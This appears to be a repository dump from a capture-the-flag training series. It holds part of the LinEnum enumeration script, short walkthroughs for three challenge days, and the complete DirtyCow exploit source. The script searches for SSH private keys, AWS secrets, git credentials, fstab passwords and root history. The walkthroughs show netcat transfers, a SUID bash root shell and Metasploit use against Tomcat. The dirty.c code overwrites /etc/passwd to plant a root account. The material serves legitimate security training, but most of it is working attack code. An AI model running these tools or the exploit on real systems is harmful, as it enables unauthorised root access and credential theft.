echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2"
echo -e "\n"
fi
postcon22=`psql -U pgsql -w template1 -c 'select version()' 2>/dev/null | grep version`
if [ "$postcon22" ]; then
echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22"
echo -e "\n"
fi
#apache details - if installed
apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null`
if [ "$apachever" ]; then
echo -e "\e[00;31m[-] Apache version:\e[00m\n$apachever"
echo -e "\n"
fi
#what account is apache running under
apacheusr=`grep -i 'user\|group' /etc/apache2/envvars 2>/dev/null |awk '{sub(/.*\export /,"")}1' 2>/dev/null`
if [ "$apacheusr" ]; then
echo -e "\e[00;31m[-] Apache user configuration:\e[00m\n$apacheusr"
echo -e "\n"
fi
if [ "$export" ] && [ "$apacheusr" ]; then
mkdir --parents $format/etc-export/apache2/ 2>/dev/null
cp /etc/apache2/envvars $format/etc-export/apache2/envvars 2>/dev/null
fi
#installed apache modules
apachemodules=`apache2ctl -M 2>/dev/null; httpd -M 2>/dev/null`
if [ "$apachemodules" ]; then
echo -e "\e[00;31m[-] Installed Apache modules:\e[00m\n$apachemodules"
echo -e "\n"
fi
#htpasswd check
htpasswd=`find / -name .htpasswd -print -exec cat {} \; 2>/dev/null`
if [ "$htpasswd" ]; then
echo -e "\e[00;33m[-] htpasswd found - could contain passwords:\e[00m\n$htpasswd"
echo -e "\n"
fi
#anything in the default http home dirs (a thorough only check as output can be large)
if [ "$thorough" = "1" ]; then
apachehomedirs=`ls -alhR /var/www/ 2>/dev/null; ls -alhR /srv/www/htdocs/ 2>/dev/null; ls -alhR /usr/local/www/apache2/data/ 2>/dev/null; ls -alhR /opt/lampp/htdocs/ 2>/dev/null`
if [ "$apachehomedirs" ]; then
echo -e "\e[00;31m[-] www home dir contents:\e[00m\n$apachehomedirs"
echo -e "\n"
fi
fi
}
interesting_files()
{
echo -e "\e[00;33m### INTERESTING FILES ####################################\e[00m"
#checks to see if various files are installed
echo -e "\e[00;31m[-] Useful file locations:\e[00m" ; which nc 2>/dev/null ; which netcat 2>/dev/null ; which wget 2>/dev/null ; which nmap 2>/dev/null ; which gcc 2>/dev/null; which curl 2>/dev/null
echo -e "\n"
#limited search for installed compilers
compiler=`dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null`
if [ "$compiler" ]; then
echo -e "\e[00;31m[-] Installed compilers:\e[00m\n$compiler"
echo -e "\n"
fi
#manual check - lists out sensitive files, can we read/modify etc.
echo -e "\e[00;31m[-] Can we read/write sensitive files:\e[00m" ; ls -la /etc/passwd 2>/dev/null ; ls -la /etc/group 2>/dev/null ; ls -la /etc/profile 2>/dev/null; ls -la /etc/shadow 2>/dev/null ; ls -la /etc/master.passwd 2>/dev/null
echo -e "\n"
#search for suid files
allsuid=`find / -perm -4000 -type f 2>/dev/null`
findsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$findsuid" ]; then
echo -e "\e[00;31m[-] SUID files:\e[00m\n$findsuid"
echo -e "\n"
fi
if [ "$export" ] && [ "$findsuid" ]; then
mkdir $format/suid-files/ 2>/dev/null
for i in $findsuid; do cp $i $format/suid-files/; done 2>/dev/null
fi
#list of 'interesting' suid files - feel free to make additions
intsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
if [ "$intsuid" ]; then
echo -e "\e[00;33m[+] Possibly interesting SUID files:\e[00m\n$intsuid"
echo -e "\n"
fi
#lists world-writable suid files
wwsuid=`find $allsuid -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwsuid" ]; then
echo -e "\e[00;33m[+] World-writable SUID files:\e[00m\n$wwsuid"
echo -e "\n"
fi
#lists world-writable suid files owned by root
wwsuidrt=`find $allsuid -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwsuidrt" ]; then
echo -e "\e[00;33m[+] World-writable SUID files owned by root:\e[00m\n$wwsuidrt"
echo -e "\n"
fi
#search for sgid files
allsgid=`find / -perm -2000 -type f 2>/dev/null`
findsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$findsgid" ]; then
echo -e "\e[00;31m[-] SGID files:\e[00m\n$findsgid"
echo -e "\n"
fi
if [ "$export" ] && [ "$findsgid" ]; then
mkdir $format/sgid-files/ 2>/dev/null
for i in $findsgid; do cp $i $format/sgid-files/; done 2>/dev/null
fi
#list of 'interesting' sgid files
intsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
if [ "$intsgid" ]; then
echo -e "\e[00;33m[+] Possibly interesting SGID files:\e[00m\n$intsgid"
echo -e "\n"
fi
#lists world-writable sgid files
wwsgid=`find $allsgid -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwsgid" ]; then
echo -e "\e[00;33m[+] World-writable SGID files:\e[00m\n$wwsgid"
echo -e "\n"
fi
#lists world-writable sgid files owned by root
wwsgidrt=`find $allsgid -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwsgidrt" ]; then
echo -e "\e[00;33m[+] World-writable SGID files owned by root:\e[00m\n$wwsgidrt"
echo -e "\n"
fi
#list all files with POSIX capabilities set along with there capabilities
fileswithcaps=`getcap -r / 2>/dev/null || /sbin/getcap -r / 2>/dev/null`
if [ "$fileswithcaps" ]; then
echo -e "\e[00;31m[+] Files with POSIX capabilities set:\e[00m\n$fileswithcaps"
echo -e "\n"
fi
if [ "$export" ] && [ "$fileswithcaps" ]; then
mkdir $format/files_with_capabilities/ 2>/dev/null
for i in $fileswithcaps; do cp $i $format/files_with_capabilities/; done 2>/dev/null
fi
#searches /etc/security/capability.conf for users associated capapilies
userswithcaps=`grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null`
if [ "$userswithcaps" ]; then
echo -e "\e[00;33m[+] Users with specific POSIX capabilities:\e[00m\n$userswithcaps"
echo -e "\n"
fi
if [ "$userswithcaps" ] ; then
#matches the capabilities found associated with users with the current user
matchedcaps=`echo -e "$userswithcaps" | grep \`whoami\` | awk '{print $1}' 2>/dev/null`
if [ "$matchedcaps" ]; then
echo -e "\e[00;33m[+] Capabilities associated with the current user:\e[00m\n$matchedcaps"
echo -e "\n"
#matches the files with capapbilities with capabilities associated with the current user
matchedfiles=`echo -e "$matchedcaps" | while read -r cap ; do echo -e "$fileswithcaps" | grep "$cap" ; done 2>/dev/null`
if [ "$matchedfiles" ]; then
echo -e "\e[00;33m[+] Files with the same capabilities associated with the current user (You may want to try abusing those capabilties):\e[00m\n$matchedfiles"
echo -e "\n"
#lists the permissions of the files having the same capabilies associated with the current user
matchedfilesperms=`echo -e "$matchedfiles" | awk '{print $1}' | while read -r f; do ls -la $f ;done 2>/dev/null`
echo -e "\e[00;33m[+] Permissions of files with the same capabilities associated with the current user:\e[00m\n$matchedfilesperms"
echo -e "\n"
if [ "$matchedfilesperms" ]; then
#checks if any of the files with same capabilities associated with the current user is writable
writablematchedfiles=`echo -e "$matchedfiles" | awk '{print $1}' | while read -r f; do find $f -writable -exec ls -la {} + ;done 2>/dev/null`
if [ "$writablematchedfiles" ]; then
echo -e "\e[00;33m[+] User/Group writable files with the same capabilities associated with the current user:\e[00m\n$writablematchedfiles"
echo -e "\n"
fi
fi
fi
fi
fi
#look for private keys - thanks djhohnstein
if [ "$thorough" = "1" ]; then
privatekeyfiles=`grep -rl "PRIVATE KEY-----" /home 2>/dev/null`
if [ "$privatekeyfiles" ]; then
echo -e "\e[00;33m[+] Private SSH keys found!:\e[00m\n$privatekeyfiles"
echo -e "\n"
fi
fi
#look for AWS keys - thanks djhohnstein
if [ "$thorough" = "1" ]; then
awskeyfiles=`grep -rli "aws_secret_access_key" /home 2>/dev/null`
if [ "$awskeyfiles" ]; then
echo -e "\e[00;33m[+] AWS secret keys found!:\e[00m\n$awskeyfiles"
echo -e "\n"
fi
fi
#look for git credential files - thanks djhohnstein
if [ "$thorough" = "1" ]; then
gitcredfiles=`find / -name ".git-credentials" 2>/dev/null`
if [ "$gitcredfiles" ]; then
echo -e "\e[00;33m[+] Git credentials saved on the machine!:\e[00m\n$gitcredfiles"
echo -e "\n"
fi
fi
#list all world-writable files excluding /proc and /sys
if [ "$thorough" = "1" ]; then
wwfiles=`find / ! -path "*/proc/*" ! -path "/sys/*" -perm -2 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwfiles" ]; then
echo -e "\e[00;31m[-] World-writable files (excluding /proc and /sys):\e[00m\n$wwfiles"
echo -e "\n"
fi
fi
if [ "$thorough" = "1" ]; then
if [ "$export" ] && [ "$wwfiles" ]; then
mkdir $format/ww-files/ 2>/dev/null
for i in $wwfiles; do cp --parents $i $format/ww-files/; done 2>/dev/null
fi
fi
#are any .plan files accessible in /home (could contain useful information)
usrplan=`find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
if [ "$usrplan" ]; then
echo -e "\e[00;31m[-] Plan file permissions and contents:\e[00m\n$usrplan"
echo -e "\n"
fi
if [ "$export" ] && [ "$usrplan" ]; then
mkdir $format/plan_files/ 2>/dev/null
for i in $usrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null
fi
bsdusrplan=`find /usr/home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
if [ "$bsdusrplan" ]; then
echo -e "\e[00;31m[-] Plan file permissions and contents:\e[00m\n$bsdusrplan"
echo -e "\n"
fi
if [ "$export" ] && [ "$bsdusrplan" ]; then
mkdir $format/plan_files/ 2>/dev/null
for i in $bsdusrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null
fi
#are there any .rhosts files accessible - these may allow us to login as another user etc.
rhostsusr=`find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$rhostsusr" ]; then
echo -e "\e[00;33m[+] rhost config file(s) and file contents:\e[00m\n$rhostsusr"
echo -e "\n"
fi
if [ "$export" ] && [ "$rhostsusr" ]; then
mkdir $format/rhosts/ 2>/dev/null
for i in $rhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null
fi
bsdrhostsusr=`find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$bsdrhostsusr" ]; then
echo -e "\e[00;33m[+] rhost config file(s) and file contents:\e[00m\n$bsdrhostsusr"
echo -e "\n"
fi
if [ "$export" ] && [ "$bsdrhostsusr" ]; then
mkdir $format/rhosts 2>/dev/null
for i in $bsdrhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null
fi
rhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$rhostssys" ]; then
echo -e "\e[00;33m[+] Hosts.equiv file and contents: \e[00m\n$rhostssys"
echo -e "\n"
fi
if [ "$export" ] && [ "$rhostssys" ]; then
mkdir $format/rhosts/ 2>/dev/null
for i in $rhostssys; do cp --parents $i $format/rhosts/; done 2>/dev/null
fi
#list nfs shares/permisisons etc.
nfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null`
if [ "$nfsexports" ]; then
echo -e "\e[00;31m[-] NFS config details: \e[00m\n$nfsexports"
echo -e "\n"
fi
if [ "$export" ] && [ "$nfsexports" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/exports $format/etc-export/exports 2>/dev/null
fi
if [ "$thorough" = "1" ]; then
#phackt
#displaying /etc/fstab
fstab=`cat /etc/fstab 2>/dev/null`
if [ "$fstab" ]; then
echo -e "\e[00;31m[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems\e[00m"
echo -e "$fstab"
echo -e "\n"
fi
fi
#looking for credentials in /etc/fstab
fstab=`grep username /etc/fstab 2>/dev/null |awk '{sub(/.*\username=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo username: 2>/dev/null; grep password /etc/fstab 2>/dev/null |awk '{sub(/.*\password=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo password: 2>/dev/null; grep domain /etc/fstab 2>/dev/null |awk '{sub(/.*\domain=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo domain: 2>/dev/null`
if [ "$fstab" ]; then
echo -e "\e[00;33m[+] Looks like there are credentials in /etc/fstab!\e[00m\n$fstab"
echo -e "\n"
fi
if [ "$export" ] && [ "$fstab" ]; then
mkdir $format/etc-exports/ 2>/dev/null
cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null
fi
fstabcred=`grep cred /etc/fstab 2>/dev/null |awk '{sub(/.*\credentials=/,"");sub(/\,.*/,"")}1' 2>/dev/null | xargs -I{} sh -c 'ls -la {}; cat {}' 2>/dev/null`
if [ "$fstabcred" ]; then
echo -e "\e[00;33m[+] /etc/fstab contains a credentials file!\e[00m\n$fstabcred"
echo -e "\n"
fi
if [ "$export" ] && [ "$fstabcred" ]; then
mkdir $format/etc-exports/ 2>/dev/null
cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null
fi
#use supplied keyword and cat *.conf files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ]; then
echo -e "[-] Can't search *.conf files as no keyword was entered\n"
else
confkey=`find / -maxdepth 4 -name *.conf -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
if [ "$confkey" ]; then
echo -e "\e[00;31m[-] Find keyword ($keyword) in .conf files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$confkey"
echo -e "\n"
else
echo -e "\e[00;31m[-] Find keyword ($keyword) in .conf files (recursive 4 levels):\e[00m"
echo -e "'$keyword' not found in any .conf files"
echo -e "\n"
fi
fi
if [ "$keyword" = "" ]; then
:
else
if [ "$export" ] && [ "$confkey" ]; then
confkeyfile=`find / -maxdepth 4 -name *.conf -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
mkdir --parents $format/keyword_file_matches/config_files/ 2>/dev/null
for i in $confkeyfile; do cp --parents $i $format/keyword_file_matches/config_files/ ; done 2>/dev/null
fi
fi
#use supplied keyword and cat *.php files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ]; then
echo -e "[-] Can't search *.php files as no keyword was entered\n"
else
phpkey=`find / -maxdepth 10 -name *.php -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
if [ "$phpkey" ]; then
echo -e "\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels - output format filepath:identified line number where keyword appears):\e[00m\n$phpkey"
echo -e "\n"
else
echo -e "\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels):\e[00m"
echo -e "'$keyword' not found in any .php files"
echo -e "\n"
fi
fi
if [ "$keyword" = "" ]; then
:
else
if [ "$export" ] && [ "$phpkey" ]; then
phpkeyfile=`find / -maxdepth 10 -name *.php -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
mkdir --parents $format/keyword_file_matches/php_files/ 2>/dev/null
for i in $phpkeyfile; do cp --parents $i $format/keyword_file_matches/php_files/ ; done 2>/dev/null
fi
fi
#use supplied keyword and cat *.log files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ];then
echo -e "[-] Can't search *.log files as no keyword was entered\n"
else
logkey=`find / -maxdepth 4 -name *.log -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
if [ "$logkey" ]; then
echo -e "\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$logkey"
echo -e "\n"
else
echo -e "\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels):\e[00m"
echo -e "'$keyword' not found in any .log files"
echo -e "\n"
fi
fi
if [ "$keyword" = "" ];then
:
else
if [ "$export" ] && [ "$logkey" ]; then
logkeyfile=`find / -maxdepth 4 -name *.log -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
mkdir --parents $format/keyword_file_matches/log_files/ 2>/dev/null
for i in $logkeyfile; do cp --parents $i $format/keyword_file_matches/log_files/ ; done 2>/dev/null
fi
fi
#use supplied keyword and cat *.ini files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ];then
echo -e "[-] Can't search *.ini files as no keyword was entered\n"
else
inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -Hn $keyword {} \; 2>/dev/null`
if [ "$inikey" ]; then
echo -e "\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$inikey"
echo -e "\n"
else
echo -e "\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels):\e[00m"
echo -e "'$keyword' not found in any .ini files"
echo -e "\n"
fi
fi
if [ "$keyword" = "" ];then
:
else
if [ "$export" ] && [ "$inikey" ]; then
inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -lHn $keyword {} \; 2>/dev/null`
mkdir --parents $format/keyword_file_matches/ini_files/ 2>/dev/null
for i in $inikey; do cp --parents $i $format/keyword_file_matches/ini_files/ ; done 2>/dev/null
fi
fi
#quick extract of .conf files from /etc - only 1 level
allconf=`find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null`
if [ "$allconf" ]; then
echo -e "\e[00;31m[-] All *.conf files in /etc (recursive 1 level):\e[00m\n$allconf"
echo -e "\n"
fi
if [ "$export" ] && [ "$allconf" ]; then
mkdir $format/conf-files/ 2>/dev/null
for i in $allconf; do cp --parents $i $format/conf-files/; done 2>/dev/null
fi
#extract any user history files that are accessible
usrhist=`ls -la ~/.*_history 2>/dev/null`
if [ "$usrhist" ]; then
echo -e "\e[00;31m[-] Current user's history files:\e[00m\n$usrhist"
echo -e "\n"
fi
if [ "$export" ] && [ "$usrhist" ]; then
mkdir $format/history_files/ 2>/dev/null
for i in $usrhist; do cp --parents $i $format/history_files/; done 2>/dev/null
fi
#can we read roots *_history files - could be passwords stored etc.
roothist=`ls -la /root/.*_history 2>/dev/null`
if [ "$roothist" ]; then
echo -e "\e[00;33m[+] Root's history files are accessible!\e[00m\n$roothist"
echo -e "\n"
fi
if [ "$export" ] && [ "$roothist" ]; then
mkdir $format/history_files/ 2>/dev/null
cp $roothist $format/history_files/ 2>/dev/null
fi
#all accessible .bash_history files in /home
checkbashhist=`find /home -name .bash_history -print -exec cat {} 2>/dev/null \;`
if [ "$checkbashhist" ]; then
echo -e "\e[00;31m[-] Location and contents (if accessible) of .bash_history file(s):\e[00m\n$checkbashhist"
echo -e "\n"
fi
#any .bak files that may be of interest
bakfiles=`find / -name *.bak -type f 2</dev/null`
if [ "$bakfiles" ]; then
echo -e "\e[00;31m[-] Location and Permissions (if accessible) of .bak file(s):\e[00m"
for bak in `echo $bakfiles`; do ls -la $bak;done
echo -e "\n"
fi
#is there any mail accessible
readmail=`ls -la /var/mail 2>/dev/null`
if [ "$readmail" ]; then
echo -e "\e[00;31m[-] Any interesting mail in /var/mail:\e[00m\n$readmail"
echo -e "\n"
fi
#can we read roots mail
readmailroot=`head /var/mail/root 2>/dev/null`
if [ "$readmailroot" ]; then
echo -e "\e[00;33m[+] We can read /var/mail/root! (snippet below)\e[00m\n$readmailroot"
echo -e "\n"
fi
if [ "$export" ] && [ "$readmailroot" ]; then
mkdir $format/mail-from-root/ 2>/dev/null
cp $readmailroot $format/mail-from-root/ 2>/dev/null
fi
}
docker_checks()
{
#specific checks - check to see if we're in a docker container
dockercontainer=` grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`
if [ "$dockercontainer" ]; then
echo -e "\e[00;33m[+] Looks like we're in a Docker container:\e[00m\n$dockercontainer"
echo -e "\n"
fi
#specific checks - check to see if we're a docker host
dockerhost=`docker --version 2>/dev/null; docker ps -a 2>/dev/null`
if [ "$dockerhost" ]; then
echo -e "\e[00;33m[+] Looks like we're hosting Docker:\e[00m\n$dockerhost"
echo -e "\n"
fi
#specific checks - are we a member of the docker group
dockergrp=`id | grep -i docker 2>/dev/null`
if [ "$dockergrp" ]; then
echo -e "\e[00;33m[+] We're a member of the (docker) group - could possibly misuse these rights!\e[00m\n$dockergrp"
echo -e "\n"
fi
#specific checks - are there any docker files present
dockerfiles=`find / -name Dockerfile -exec ls -l {} 2>/dev/null \;`
if [ "$dockerfiles" ]; then
echo -e "\e[00;31m[-] Anything juicy in the Dockerfile:\e[00m\n$dockerfiles"
echo -e "\n"
fi
#specific checks - are there any docker files present
dockeryml=`find / -name docker-compose.yml -exec ls -l {} 2>/dev/null \;`
if [ "$dockeryml" ]; then
echo -e "\e[00;31m[-] Anything juicy in docker-compose.yml:\e[00m\n$dockeryml"
echo -e "\n"
fi
}
lxc_container_checks()
{
#specific checks - are we in an lxd/lxc container
lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`
if [ "$lxccontainer" ]; then
echo -e "\e[00;33m[+] Looks like we're in a lxc container:\e[00m\n$lxccontainer"
echo -e "\n"
fi
#specific checks - are we a member of the lxd group
lxdgroup=`id | grep -i lxd 2>/dev/null`
if [ "$lxdgroup" ]; then
echo -e "\e[00;33m[+] We're a member of the (lxd) group - could possibly misuse these rights!\e[00m\n$lxdgroup"
echo -e "\n"
fi
}
footer()
{
echo -e "\e[00;33m### SCAN COMPLETE ####################################\e[00m"
}
call_each()
{
header
debug_info
system_info
user_info
environmental_info
job_info
networking_info
services_info
software_configs
interesting_files
docker_checks
lxc_container_checks
footer
}
while getopts "h:k:r:e:st" option; do
case "${option}" in
k) keyword=${OPTARG};;
r) report=${OPTARG}"-"`date +"%d-%m-%y"`;;
e) export=${OPTARG};;
s) sudopass=1;;
t) thorough=1;;
h) usage; exit;;
*) usage; exit;;
esac
done
call_each | tee -a $report 2> /dev/null
#EndOfScript
================================================
FILE: Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/README.md
================================================
# The Rogue Gnome
Before we begin, we're going to need to deploy two Instances:
1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
- What type of privilege escalation involves using a user account to execute commands as an administrator?
- `vertical`
- What is the name of the file that contains a list of users who are a part of the sudo group?
- `sudoers`
- Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP
Input the following password when prompted: aoc2020
no answer needed
- Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
You may find uploading some of the enumeration scripts that were used during today's task to be useful.
no answer needed
- On your machine `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
- `nc -lvnp 4444 < linEnum.sh`
- On target `nc -w 3 <YOUR_IP> 4444 > linEnum.sh`
- On target `chmod +x && ./linEnum.sh`
- We can see there is `/bin/bash`. Good.
- This could be done also with `find / -perm -u=s -type f 2>/dev/null`
- On target `bash -p`
- `cat /root/flag.txt`
- Use this executable to launch a system shell as root.
What are the contents of the file located at /root/flag.txt?
- `thm{*****************}`
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-12-Ready,_set,_elf./README.md
================================================
# Ready, set, elf.
- What is the version number of the web server?
- `nmap -sV <TARGET_IP>` (Remember, if it says "host seems down", use `-Pn`, look for what it means)
- `9.0.17`
- What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)
- `msfconsole`
- `search tomcat 9`
- It outputs `exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10`. googling then...
- `CVE-2019-0232`
- Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.
no answer needed
- after search, It should outputs only one exploit, anyway use `use 0` if the output is only one, or the appropriate number
- `set RHOSTS <TARGET_IP>`
- `set RPORT 8080`
- `set LHOST <YOUR_IP>`
- `set targeturi /cgi-bin/elfwhacker.bat`
- `run` or `exploit`
- What are the contents of flag1.txt?
- `cat flag1.txt`
- `thm{********_***_***_*****}`
- Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!
no answer needed
================================================
FILE: Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/README.md
================================================
# Coal for Christmas
- Hi Santa, hop in your sleigh and deploy this machine!
no answer needed
- nmap <TARGET_IP>
no answer needed
- `nmap <TARGET_IP>`
- What old, deprecated protocol and service is running?
- `telnet`
- What credential was left for you?
- `telnet <TARGET_IP> 23`
- `clauschristmas`
- What distribution of Linux and version number is this server running?
- `uname -a`
- `Ubuntu 12.04`
- Who got here first?
- `cat cookies_and_milk.txt`
- `grinch`
- This cookies_and_milk.txt file looks like a modified rendition of a DirtyCow exploit, usually written in C. Find a copy of that original file online, and get it on the target box. You can do this with some simple file transfer methods like netcat, or spinning up a quick Python HTTP server... or you can simply copy-and-paste it into a text editor on the box!
no answer needed
- [dirtycow](https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c)
- On your machine `nc -lnvp 4444 < dirty.c`
- On target `nc -w 3 <YOUR_IP> 4444 > dirty.c`
- What is the verbatim syntax you can use to compile, taken from the real C source code comments?
- `gcc -pthread dirty.c -o dirty -lcrypt`
- Run the commands to compile the exploit, and run it.
What "new" username was created, with the default operations of the real C source code?
- `./dirty` and then enter the password you've chosen
- `firefart`
- What is the MD5 hash output?
- `cat message_from_the_grinch.txt`
- `touch coal`
- `tree | md5sum`
- `********************************`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/dirty.c
================================================
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}
================================================
